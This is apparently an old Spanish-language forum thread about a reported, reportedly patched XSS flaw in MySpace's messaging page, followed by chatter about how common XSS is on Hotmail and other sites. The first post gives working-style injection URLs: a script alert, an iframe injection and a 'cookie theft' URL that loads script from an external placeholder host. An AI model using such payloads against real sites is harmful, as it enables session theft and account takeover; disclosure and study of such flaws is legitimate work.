Xss in Myspace Robo de Cookies

[Girl!]

Ha sido corregida

XSS in MySpace Robo de cookie. Descubierto y reportado por rMrGvG

Cuando queremos acceder a myspace a una direccion que no es la de inicio myspace.com(ejemplo http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=1 ) , este nos guarda la dirección completa en la cookie en los valores nextpage en la clave login de la misma ( fuseaction=login&nextPage=fuseaction=mail.inbox&mytoken=1) para redireccionarnos una vez logueados,a la variable mytoken podemos inyectarle código cerrandola mediante "> %22%3E también podemos inyectar en la variale friendID y asegurar la variable MyToken a 1de esta manera se ejecutaba el código tras loguearnos, pudiendo robar la cookie.

Aunque la inyección ya haya sido parcheada y nos hayan dejado publicarla, aun se puede demostrar la misma del siguiente modo, actualmente myspace pasa las variables a "> &quot;&gt; o nos da errores al usar < %3C sin embargo si nos logueamos erroneamente en myspace no se aplica la seguridad codificando los caracteres y vemos la inyección ahora mucho menos peligrosa, y que antes podía ser utilizada para robar cuentas de usuarios.

Ejemplo demostración de la inyeccion (debemos introducir una clave erronea para q nos muestre el código inyectado):
http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox&Mytoken=">rMrGvG

Imagen inyección

XSS:
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><script>alert('rMrGvG')</script>&MyToken=1
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID="><iframe src=http://sni-labs.com></iframe>&MyToken=1

ROBO de cookies
http://messaging.myspace.com/index.cfm?fuseaction=mail.message&friendID=<script src="http://url/script.js"></script>&MyToken=1

Fuente http://sni-labs.com

[ANELKAOS]

Muy buena estas poniendo bien alto el listón de los XSS jeje

[putus]

esto parece que ya no sirve....

[Girl!]

Sap eso pone al principio del tema
aquí está el momby aunque ya ha terminado y  las más importantes corregidas , pero ene l ultimo del dia 30 aparece el popurrí y algunas aun vann
A pàrte se muestras XSS y formas de evadirlos muy interesantess
BIssos

MOMBY:

http://sni-labs.com/MOMBY/

[yeikos]

Heché un vistazo rápido a la lista de fallos y no encontré ninguno que funcionara.

Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...

[Girl!]

no sé a q tipo te refieres si es  a MOndo o MUstachio desde luego momby, es un pryecto donde participaron grandes, como Rsnake (ha.ckers.org), Mustlive o Awesome Andrew

Bissuus 

[yeikos]

Queria decir que las inyecciones XSS no tienen ningún merito encontrarlas, muchas páginas webs importantes las sufren, veáse Hotmail o Yahoo.

Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...

[oRTNZ]

xd.. siguen..
por mi parte puedo decir que web QUE NO haya  encontrado YO que no tenga injeccion o xss, pues QUE TIREN LA PRIMERA PIEDRA "QUIEN NO TENGA TAL PROBLEMA", aun mayor ... las variables las PODEMOS CREAR TODOS  , ADEMAS sigue teniendo el bug... hotmail xd  sin mas que decirles un saludo!
pd:

es un pryecto donde participaron grandes, como

GRANDES, no Gril! PUBICOS  .

[Man-In-the-Middle]

De Peru??? oRTNZ  ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM

[yeikos]

De Peru??? oRTNZ  ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,

saludos..,//
MITM

Eso dependerá de la configuración que tengas en tu Internet Explorer.

Hotmail está lleno de inyecciones XSS, yo me puse una tarde y saqué dos que no estaban publicadas, y por muchos foros veo cada día inyecciones a Hotmail y otras páginas webs.

¿Conclusión? No hay que ser "uno de los grandes" para encontrar una inyección XSS/SQL, y menos en myspace beta.